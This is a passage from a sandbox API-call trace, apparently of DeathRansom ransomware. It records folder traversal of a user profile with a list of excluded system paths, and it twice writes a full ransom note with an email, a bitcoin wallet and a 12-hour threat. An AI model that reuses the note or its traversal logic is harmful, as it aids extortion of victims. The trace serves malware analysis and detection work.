lpMem=0x8c60138 | out: hHeap=0x4f10000) returned 1 [0075.566] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8155ffb0, ftCreationTime.dwHighDateTime=0x1d599a8, ftLastAccessTime.dwLowDateTime=0xa5f5bbe0, ftLastAccessTime.dwHighDateTime=0x1d53eb7, ftLastWriteTime.dwLowDateTime=0xa5f5bbe0, ftLastWriteTime.dwHighDateTime=0x1d53eb7, nFileSizeHigh=0x0, nFileSizeLow=0x1999, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="q6BY.pptx", cAlternateFileName="Q6BY~1.PPT")) returned 1 [0075.566] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\q6BY.pptx") returned 53 [0075.566] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f7e4e70, ftCreationTime.dwHighDateTime=0x1d52a97, ftLastAccessTime.dwLowDateTime=0xf6f790, ftLastAccessTime.dwHighDateTime=0x1d538bc, ftLastWriteTime.dwLowDateTime=0xf6f790, ftLastWriteTime.dwHighDateTime=0x1d538bc, nFileSizeHigh=0x0, nFileSizeLow=0x14053, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="QwIqKQSVxE 5799zU.docx", cAlternateFileName="QWIQKQ~1.DOC")) returned 1 [0075.566] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QwIqKQSVxE 5799zU.docx") returned 67 [0075.566] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50279940, ftCreationTime.dwHighDateTime=0x1d5715c, ftLastAccessTime.dwLowDateTime=0x72f13760, ftLastAccessTime.dwHighDateTime=0x1d55e60, ftLastWriteTime.dwLowDateTime=0x72f13760, ftLastWriteTime.dwHighDateTime=0x1d55e60, nFileSizeHigh=0x0, nFileSizeLow=0xb64d, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="WQ1kIjdf.docx", cAlternateFileName="WQ1KIJ~1.DOC")) returned 1 [0075.566] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WQ1kIjdf.docx") returned 57 [0075.566] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf78b1e0, ftCreationTime.dwHighDateTime=0x1d57a53, ftLastAccessTime.dwLowDateTime=0x7cbb2410, ftLastAccessTime.dwHighDateTime=0x1d56561, ftLastWriteTime.dwLowDateTime=0x7cbb2410, ftLastWriteTime.dwHighDateTime=0x1d56561, nFileSizeHigh=0x0, nFileSizeLow=0xeb6a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="xCG7cBBdA26D4C4a7O.docx", cAlternateFileName="XCG7CB~1.DOC")) returned 1 [0075.566] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xCG7cBBdA26D4C4a7O.docx") returned 67 [0075.566] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f2f8d20, ftCreationTime.dwHighDateTime=0x1d54339, ftLastAccessTime.dwLowDateTime=0xdc198290, ftLastAccessTime.dwHighDateTime=0x1d55e58, ftLastWriteTime.dwLowDateTime=0xdc198290, ftLastWriteTime.dwHighDateTime=0x1d55e58, nFileSizeHigh=0x0, nFileSizeLow=0xb511, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="X_wIoPGx2gE8.xlsx", cAlternateFileName="X_WIOP~1.XLS")) returned 1 [0075.566] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X_wIoPGx2gE8.xlsx") returned 61 [0075.566] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1c641b0, ftCreationTime.dwHighDateTime=0x1d52aa1, ftLastAccessTime.dwLowDateTime=0x9f21c790, ftLastAccessTime.dwHighDateTime=0x1d54665, ftLastWriteTime.dwLowDateTime=0x9f21c790, ftLastWriteTime.dwHighDateTime=0x1d54665, nFileSizeHigh=0x0, nFileSizeLow=0x11ed2, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="z7-C3T grbVW2iC.pptx", cAlternateFileName="Z7-C3T~1.PPT")) returned 1 [0075.566] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z7-C3T grbVW2iC.pptx") returned 64 [0075.566] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3779310, ftCreationTime.dwHighDateTime=0x1d518d2, ftLastAccessTime.dwLowDateTime=0x97db3270, ftLastAccessTime.dwHighDateTime=0x1d520fc, ftLastWriteTime.dwLowDateTime=0x97db3270, ftLastWriteTime.dwHighDateTime=0x1d520fc, nFileSizeHigh=0x0, nFileSizeLow=0x4f5d, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ZaYCVmfMWKGans6Q.pptx", cAlternateFileName="ZAYCVM~1.PPT")) returned 1 [0075.566] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZaYCVmfMWKGans6Q.pptx") returned 65 [0075.566] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3779310, ftCreationTime.dwHighDateTime=0x1d518d2, ftLastAccessTime.dwLowDateTime=0x97db3270, ftLastAccessTime.dwHighDateTime=0x1d520fc, ftLastWriteTime.dwLowDateTime=0x97db3270, ftLastWriteTime.dwHighDateTime=0x1d520fc, nFileSizeHigh=0x0, nFileSizeLow=0x4f5d, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ZaYCVmfMWKGans6Q.pptx", cAlternateFileName="ZAYCVM~1.PPT")) returned 0 [0075.566] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.566] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\read_me.txt") returned 55 [0075.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.567] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.567] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.568] CloseHandle (hObject=0x7a0) returned 1 [0075.568] GetProcessHeap () returned 0x4f10000 [0075.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b700c0 | out: hHeap=0x4f10000) returned 1 [0075.568] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0075.568] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned 43 [0075.568] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0075.568] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0075.568] StrStrW (lpFirst="downloads", lpSrch="programdata") returned 0x0 [0075.568] StrStrW (lpFirst="downloads", lpSrch="$recycle.bin") returned 0x0 [0075.568] StrStrW (lpFirst="downloads", lpSrch="program files") returned 0x0 [0075.568] StrStrW (lpFirst="downloads", lpSrch="windows") returned 0x0 [0075.568] StrStrW (lpFirst="downloads", lpSrch="all users") returned 0x0 [0075.568] StrStrW (lpFirst="downloads", lpSrch="appdata") returned 0x0 [0075.568] GetProcessHeap () returned 0x4f10000 [0075.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b700c0 [0075.568] lstrcpyW (in: lpString1=0x8b700c0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0075.568] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 60 [0075.568] QueueUserWorkItem (Function=0x40a710, Context=0x8b700c0, Flags=0x0) returned 1 [0075.568] GetProcessHeap () returned 0x4f10000 [0075.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c60138 [0075.568] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*") returned 45 [0075.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.569] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\.") returned 45 [0075.569] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.569] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.569] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.569] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\..") returned 46 [0075.569] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.569] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.569] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0075.569] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0075.569] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.569] wnsprintfW (in: pszDest=0x8c60138, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\read_me.txt") returned 55 [0075.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.569] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.569] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.570] CloseHandle (hObject=0x7a0) returned 1 [0075.570] GetProcessHeap () returned 0x4f10000 [0075.570] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c60138 | out: hHeap=0x4f10000) returned 1 [0075.571] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0075.571] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned 43 [0075.571] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0075.571] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0075.571] StrStrW (lpFirst="favorites", lpSrch="programdata") returned 0x0 [0075.571] StrStrW (lpFirst="favorites", lpSrch="$recycle.bin") returned 0x0 [0075.571] StrStrW (lpFirst="favorites", lpSrch="program files") returned 0x0 [0075.571] StrStrW (lpFirst="favorites", lpSrch="windows") returned 0x0 [0075.571] StrStrW (lpFirst="favorites", lpSrch="all users") returned 0x0 [0075.571] StrStrW (lpFirst="favorites", lpSrch="appdata") returned 0x0 [0075.571] GetProcessHeap () returned 0x4f10000 [0075.571] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c60138 [0075.571] lstrcpyW (in: lpString1=0x8c60138, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0075.571] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 61 [0075.571] QueueUserWorkItem (Function=0x40a710, Context=0x8c60138, Flags=0x0) returned 1 [0075.571] GetProcessHeap () returned 0x4f10000 [0075.571] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c80048 [0075.573] wnsprintfW (in: pszDest=0x8c80048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 45 [0075.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.573] wnsprintfW (in: pszDest=0x8c80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\.") returned 45 [0075.573] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.573] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.573] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.573] wnsprintfW (in: pszDest=0x8c80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\..") returned 46 [0075.573] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.573] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.573] wnsprintfW (in: pszDest=0x8c80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0075.573] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Links", cAlternateFileName="")) returned 1 [0075.573] wnsprintfW (in: pszDest=0x8c80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned 49 [0075.573] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0075.573] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0075.573] StrStrW (lpFirst="links", lpSrch="programdata") returned 0x0 [0075.573] StrStrW (lpFirst="links", lpSrch="$recycle.bin") returned 0x0 [0075.573] StrStrW (lpFirst="links", lpSrch="program files") returned 0x0 [0075.574] StrStrW (lpFirst="links", lpSrch="windows") returned 0x0 [0075.574] StrStrW (lpFirst="links", lpSrch="all users") returned 0x0 [0075.574] StrStrW (lpFirst="links", lpSrch="appdata") returned 0x0 [0075.574] GetProcessHeap () returned 0x4f10000 [0075.574] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c91058 [0075.575] lstrcpyW (in: lpString1=0x8c91058, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0075.575] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 62 [0075.575] QueueUserWorkItem (Function=0x40a710, Context=0x8c91058, Flags=0x0) returned 1 [0075.575] GetProcessHeap () returned 0x4f10000 [0075.575] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ca1060 [0075.576] wnsprintfW (in: pszDest=0x8ca1060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*") returned 51 [0075.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.576] wnsprintfW (in: pszDest=0x8ca1060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\.") returned 51 [0075.576] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.576] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, 